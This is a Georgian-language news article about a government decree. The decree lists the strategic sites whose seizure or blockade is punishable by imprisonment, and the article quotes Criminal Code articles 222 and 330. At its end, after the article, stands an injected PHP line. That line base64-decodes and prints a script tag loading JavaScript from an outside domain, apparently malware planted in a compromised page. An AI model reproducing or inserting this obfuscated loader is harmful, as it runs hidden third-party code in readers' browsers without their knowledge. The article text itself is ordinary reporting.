celsiusi
ავერსი საქკაბელი

ცენტრალური საარჩევნო კომისიის შენობის ხელში ჩაგდება ან ბლოკირება თავისუფლების აღკვეთით დაისჯება.

მთავრობის შესაბამის დადგენილებას, პრემიერ-მინისტრმა ირაკლი კობახიძემ ხელი 23 ოქტომბერს მოაწერა.

დოკუმენტით ზუსტდება ის სტრატეგიული და განსაკუთრებული მნიშვნელობის ობიექტები, რომელთა ხელში ჩაგდება ან ბლოკირება თავისუფლების აღკვეთით დაისჯება.

ობიექტების ჩამონათვალშია მათ შორის ცენტრალური საარჩევნო კომისიის შენობაც.

დოკუმენტის მიხედვით სტრატეგიული ან/და განსაკუთრებული მნიშვნელობის ობიექტებს განეკუთვნება:

ა) საქართველოს უმაღლესი წარმომადგენლობითი ორგანოს ან/და აღმასრულებელი ხელისუფლების ორგანოების/დაწესებულებების, აგრეთვე ავტონომიური რესპუბლიკების უმაღლესი წარმომადგენლობითი ან/და აღმასრულებელი ორგანოების ადმინისტრაციული შენობები;

ბ) საქართველოს პრეზიდენტის ადმინისტრაციის ადმინისტრაციული შენობა;

გ) საქართველოს მთავრობის ადმინისტრაციის ადმინისტრაციული შენობა;

დ) საქართველოს საკონსტიტუციო სასამართლოსა და საერთო სასამართლოების ადმინისტრაციული შენობები;

ე) საქართველოს იუსტიციის უმაღლესი საბჭოს ადმინისტრაციული შენობა;

ვ) მუნიციპალიტეტის საკრებულოს ან/და მერიის ადმინისტრაციული შენობები;

ზ) საქართველოს პროკურატურის სისტემის ადმინისტრაციული შენობები;

თ) ეროვნული უსაფრთხოების საბჭოს აპარატის ადმინისტრაციული შენობა;

ი) საქართველოს სახელმწიფო უსაფრთხოების სამსახურის ადმინისტრაციული შენობა;

კ) საქართველოს დაზვერვის სამსახურის ადმინისტრაციული შენობა;

ლ) საქართველოს ეროვნული ბანკის ადმინისტრაციული შენობა;

მ) საელჩოები და საკონსულო დაწესებულებები;

ნ) საქართველოს ცენტრალური საარჩევნო კომისიის ადმინისტრაციული შენობა;

ო) საქართველოს საპატრიარქო;

პ) სასაზღვრო გამტარი პუნქტი;

ჟ) საზღვრის დაცვის ინფრასტრუქტურა და ობიექტი;

რ) ნავთობისა და ბუნებრივი აირის საცავის ტერმინალი;

ს) გაზსაცავი ობიექტი, გაზის გამანაწილებელი ობიექტი, წყალმომარაგების ცენტრალური სისტემა (ობიექტი);

ტ) გაზშემკრები სადგური;

უ) ნავთობ და გაზგადამამუშავებელი ობიექტი, მისი საწარმოო სიმძლავრის მიუხედავად;

ფ) მაღალი ძაბვის ქვესადგური (110 კვ და მეტი);

ქ) ელექტროენერგიის გადაცემისა და განაწილების მართვის ობიექტი და სისტემა;

ღ) იმ საწარმოების შენობა-ნაგებობები, რომლებიც იყენებენ რადიოაქტიურ ან/და ტოქსიკურ ნივთიერებებს;

ყ) სახელმწიფო ან სამობილიზაციო რეზერვის სასაწყობო შენობა-ნაგებობა ან სათავსი;

შ) სტაციონარული სამედიცინო დაწესებულება, ბიოუსაფრთხოების (BSL) პირველი ან მე-2 დონის მქონე ლაბორატორიები და სამეცნიერო-კვლევითი დაწესებულებები, რომლებიც აწარმოებენ დაკვირვებებსა და კვლევებს განსაკუთრებულად საშიშ ინფექციებსა და საშიშ ინფექციურ დაავადებებზე;

ჩ) თავდაცვისა და უსაფრთხოების სექტორის სარგებლობაში არსებული შენობა-ნაგებობა;

ც) ელექტრონული საკომუნიკაციო ქსელების სახაზო ნაგებობა;

ძ) შპს „საქართველოს ტელერადიოცენტრისა“ და მაუწყებლების შენობა-ნაგებობა, სამაუწყებლო და ელექტრონული კომუნიკაციების ყველა სახის ანძა;

წ) ნავსადგურის ტერიტორია და აკვატორია (ნავმისადგომები, ტერმინალები, ჰიდროტექნიკური ნაგებობები, შუქურები, სტაციონარული საზღვაო სანავიგაციო ნიშნები, შესასვლელი არხი);

ჭ) რკინიგზა, რკინიგზის სადგური და სხვა სარკინიგზო ინფრასტრუქტურა, სარკინიგზო მოძრავი შემადგენლობა;

ხ) მაგისტრალური ნავთობსადენი, გაზსადენი და წყალსადენი;

ჯ) მეტროპოლიტენი;

ჰ) აეროპორტის ტერიტორია.

დოკუმენტში ასევე ვკითხულობთ, რომ: „ნორმატიული აქტების შესახებ“ საქართველოს ორგანული კანონის მე-12 მუხლის მე-2 პუნქტის საფუძველზე, მხოლოდ საქართველოს სისხლის სამართლის კოდექსის 222-ე მუხლის ან/და 330-ე მუხლის მიზნებისათვის, დამტკიცდეს თანდართული „სტრატეგიული ან/და განსაკუთრებული მნიშვნელობის ობიექტების ნუსხა“.

სისხლის სამართლის კოდექსის 222-ე მუხლის მიხედვით: „ტელერადიომაუწყებლობის ან კავშირგაბმულობის დაწესებულების ანდა სტრატეგიული ან განსაკუთრებული მნიშვნელობის ობიექტის ხელში ჩაგდება ან ბლოკირება, რამაც შეაფერხა ან შეეძლო შეეფერხებინა ამ დაწესებულების ან ობიექტის ნორმალური მუშაობა, ისჯება ჯარიმით ან გამასწორებელი სამუშაოთი ვადით ერთ წლამდე ანდა თავისუფლების აღკვეთით ვადით ორ წლამდე. იგივე ქმედება, ჩადენილი: ა) ჯგუფურად; ბ) არაერთგზის, ისჯება გამასწორებელი სამუშაოთი ვადით ორ წლამდე ან თავისუფლების აღკვეთით ვადით ორიდან ოთხ წლამდე.

რაც შეეხება 330-ე მუხლის მოქმედების არეალს, „სტრატეგიული ან განსაკუთრებული მნიშვნელობის ობიექტის ხელში ჩაგდება ან ბლოკირება ტერორისტული მიზნით, ისჯება თავისუფლების აღკვეთით ვადით ათიდან თხუთმეტ წლამდე. ამ მუხლის პირველი ნაწილით გათვალისწინებული ქმედება, რამაც ადამიანის სიცოცხლის მოსპობა ან სხვა მძიმე შედეგი გამოიწვია, ისჯება თავისუფლების აღკვეთით ვადით თორმეტიდან ოც წლამდე ან უვადო თავისუფლების აღკვეთით“.

54
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");